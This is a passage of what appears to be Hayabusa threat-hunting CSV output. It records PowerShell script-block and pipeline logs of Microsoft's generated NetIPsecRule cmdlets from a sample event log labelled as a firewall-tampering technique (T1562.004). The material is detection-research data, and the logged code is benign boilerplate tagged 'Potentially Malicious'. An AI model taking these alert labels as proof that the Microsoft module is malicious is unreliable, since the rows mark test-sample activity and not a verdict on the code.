} Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] 
[string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
$script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyS",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { 
foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query 
(cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyS",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"tore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.775 
+00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.775 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.775 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.776 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
